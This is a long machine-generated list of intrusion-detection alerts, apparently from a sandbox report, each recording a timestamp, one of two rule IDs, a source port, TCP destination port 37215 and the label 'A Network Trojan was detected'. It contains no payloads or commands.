              Timestamp:06/13/24-21:32:52.657016
              SID:2835222
              Source Port:50494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754865
              SID:2829579
              Source Port:33590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675391
              SID:2835222
              Source Port:53332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197884
              SID:2835222
              Source Port:43894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.084873
              SID:2829579
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726549
              SID:2829579
              Source Port:45808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439685
              SID:2835222
              Source Port:50660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213962
              SID:2835222
              Source Port:37936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565281
              SID:2829579
              Source Port:33846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790524
              SID:2829579
              Source Port:59668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675448
              SID:2835222
              Source Port:57866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169141
              SID:2835222
              Source Port:36328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503782
              SID:2835222
              Source Port:49104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222263
              SID:2829579
              Source Port:51038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241321
              SID:2829579
              Source Port:54108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193512
              SID:2829579
              Source Port:49178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213465
              SID:2829579
              Source Port:40932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790432
              SID:2829579
              Source Port:34702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676512
              SID:2835222
              Source Port:33242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.092118
              SID:2835222
              Source Port:43978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193083
              SID:2835222
              Source Port:35948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212692
              SID:2835222
              Source Port:46692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217830
              SID:2829579
              Source Port:44476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711338
              SID:2829579
              Source Port:40122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549659
              SID:2835222
              Source Port:37096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545128
              SID:2835222
              Source Port:55398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213920
              SID:2835222
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572035
              SID:2829579
              Source Port:60030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457973
              SID:2829579
              Source Port:57588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130534
              SID:2829579
              Source Port:52940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889504
              SID:2835222
              Source Port:58950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676431
              SID:2829579
              Source Port:40462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824800
              SID:2829579
              Source Port:39028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911471
              SID:2835222
              Source Port:55772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248205
              SID:2829579
              Source Port:57958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870192
              SID:2835222
              Source Port:55440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656683
              SID:2835222
              Source Port:36232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781041
              SID:2829579
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025677
              SID:2829579
              Source Port:33888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633472
              SID:2829579
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040984
              SID:2829579
              Source Port:35458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672061
              SID:2829579
              Source Port:53956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196923
              SID:2835222
              Source Port:59892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092645
              SID:2835222
              Source Port:41222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222633
              SID:2835222
              Source Port:51056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632320
              SID:2835222
              Source Port:33142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607256
              SID:2829579
              Source Port:37586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014251
              SID:2829579
              Source Port:44372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419921
              SID:2835222
              Source Port:50846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110278
              SID:2835222
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157809
              SID:2829579
              Source Port:40132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726810
              SID:2829579
              Source Port:50368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180377
              SID:2835222
              Source Port:33356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023852
              SID:2829579
              Source Port:43418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323992
              SID:2835222
              Source Port:41484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782610
              SID:2835222
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042986
              SID:2829579
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679340
              SID:2829579
              Source Port:50048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749491
              SID:2829579
              Source Port:33872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169384
              SID:2835222
              Source Port:34120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177847
              SID:2829579
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174994
              SID:2835222
              Source Port:45166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130968
              SID:2829579
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754764
              SID:2829579
              Source Port:51564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217314
              SID:2829579
              Source Port:38368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212320
              SID:2829579
              Source Port:33052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506753
              SID:2835222
              Source Port:34204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610624
              SID:2829579
              Source Port:58892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308395
              SID:2835222
              Source Port:50830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257316
              SID:2835222
              Source Port:49116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752957
              SID:2835222
              Source Port:33084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308321
              SID:2835222
              Source Port:34334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509070
              SID:2835222
              Source Port:52020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456516
              SID:2829579
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605041
              SID:2835222
              Source Port:36370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093228
              SID:2829579
              Source Port:50792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058633
              SID:2835222
              Source Port:35984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254578
              SID:2835222
              Source Port:39616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011877
              SID:2835222
              Source Port:43534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199405
              SID:2835222
              Source Port:46240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912607
              SID:2829579
              Source Port:49798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405248
              SID:2835222
              Source Port:40698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502724
              SID:2835222
              Source Port:52424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508983
              SID:2829579
              Source Port:48700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695022
              SID:2835222
              Source Port:44526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487013
              SID:2829579
              Source Port:54008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912901
              SID:2835222
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304365
              SID:2835222
              Source Port:46594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175738
              SID:2829579
              Source Port:42556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127443
              SID:2829579
              Source Port:35028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910011
              SID:2835222
              Source Port:39502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372674
              SID:2829579
              Source Port:55626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450735
              SID:2835222
              Source Port:43242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272847
              SID:2829579
              Source Port:40256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348796
              SID:2835222
              Source Port:39044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567878
              SID:2835222
              Source Port:54542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994247
              SID:2835222
              Source Port:39124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237670
              SID:2829579
              Source Port:54984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170579
              SID:2829579
              Source Port:57482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192999
              SID:2829579
              Source Port:45430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672695
              SID:2835222
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823321
              SID:2835222
              Source Port:36838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569356
              SID:2829579
              Source Port:39572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164633
              SID:2835222
              Source Port:42798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567166
              SID:2829579
              Source Port:37138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221374
              SID:2835222
              Source Port:59254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657212
              SID:2835222
              Source Port:60074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316860
              SID:2835222
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408953
              SID:2829579
              Source Port:35996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821247
              SID:2835222
              Source Port:54820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099253
              SID:2835222
              Source Port:37262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.199959
              SID:2835222
              Source Port:46058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488946
              SID:2829579
              Source Port:45926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221638
              SID:2829579
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402477
              SID:2835222
              Source Port:59414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633340
              SID:2829579
              Source Port:53362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729304
              SID:2835222
              Source Port:57796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215431
              SID:2835222
              Source Port:40294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256452
              SID:2835222
              Source Port:52226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731282
              SID:2835222
              Source Port:56880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677800
              SID:2835222
              Source Port:39896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889334
              SID:2835222
              Source Port:60136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547362
              SID:2835222
              Source Port:55012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247971
              SID:2835222
              Source Port:50232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405955
              SID:2829579
              Source Port:43482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678038
              SID:2835222
              Source Port:56178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552801
              SID:2835222
              Source Port:54618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680592
              SID:2829579
              Source Port:46150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176562
              SID:2835222
              Source Port:57096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836844
              SID:2835222
              Source Port:58274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508481
              SID:2835222
              Source Port:59930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401098
              SID:2835222
              Source Port:41640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.452819
              SID:2829579
              Source Port:35700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832919
              SID:2835222
              Source Port:55344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438804
              SID:2829579
              Source Port:59122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060154
              SID:2835222
              Source Port:50104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634436
              SID:2829579
              Source Port:60206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550749
              SID:2835222
              Source Port:55636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802881
              SID:2835222
              Source Port:52852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940881
              SID:2835222
              Source Port:49276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655126
              SID:2835222
              Source Port:49270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711141
              SID:2829579
              Source Port:50950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245472
              SID:2835222
              Source Port:38268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570364
              SID:2835222
              Source Port:59806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570620
              SID:2835222
              Source Port:35974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631030
              SID:2835222
              Source Port:46948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091820
              SID:2835222
              Source Port:48968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659582
              SID:2835222
              Source Port:42838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710385
              SID:2835222
              Source Port:55350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357478
              SID:2835222
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695295
              SID:2835222
              Source Port:59404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133543
              SID:2835222
              Source Port:53092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377668
              SID:2835222
              Source Port:35248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835237
              SID:2835222
              Source Port:47288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992509
              SID:2835222
              Source Port:56310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630975
              SID:2829579
              Source Port:39086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213627
              SID:2835222
              Source Port:35040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408659
              SID:2829579
              Source Port:51148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258386
              SID:2829579
              Source Port:40472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137997
              SID:2829579
              Source Port:43090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757442
              SID:2829579
              Source Port:39816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658684
              SID:2829579
              Source Port:46562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058490
              SID:2835222
              Source Port:47244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309486
              SID:2835222
              Source Port:58086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759231
              SID:2835222
              Source Port:53962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040447
              SID:2835222
              Source Port:53986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056472
              SID:2835222
              Source Port:44834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750646
              SID:2835222
              Source Port:60800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406087
              SID:2835222
              Source Port:41974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554494
              SID:2835222
              Source Port:60268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524846
              SID:2835222
              Source Port:48780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129170
              SID:2829579
              Source Port:44818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100419
              SID:2829579
              Source Port:34824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555808
              SID:2835222
              Source Port:44234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638733
              SID:2835222
              Source Port:54410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276557
              SID:2835222
              Source Port:33810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726571
              SID:2829579
              Source Port:46972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677031
              SID:2829579
              Source Port:58162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993231
              SID:2829579
              Source Port:39130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888317
              SID:2835222
              Source Port:46316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455733
              SID:2829579
              Source Port:50416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212525
              SID:2829579
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731033
              SID:2829579
              Source Port:37862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269553
              SID:2835222
              Source Port:57494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755907
              SID:2835222
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824583
              SID:2835222
              Source Port:34666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731013
              SID:2829579
              Source Port:45108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264123
              SID:2829579
              Source Port:45364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306398
              SID:2829579
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259361
              SID:2835222
              Source Port:38878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654630
              SID:2835222
              Source Port:47158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224287
              SID:2829579
              Source Port:37012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407020
              SID:2829579
              Source Port:34056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612851
              SID:2835222
              Source Port:59700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839280
              SID:2835222
              Source Port:39670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611878
              SID:2829579
              Source Port:54566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088063
              SID:2835222
              Source Port:59140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551584
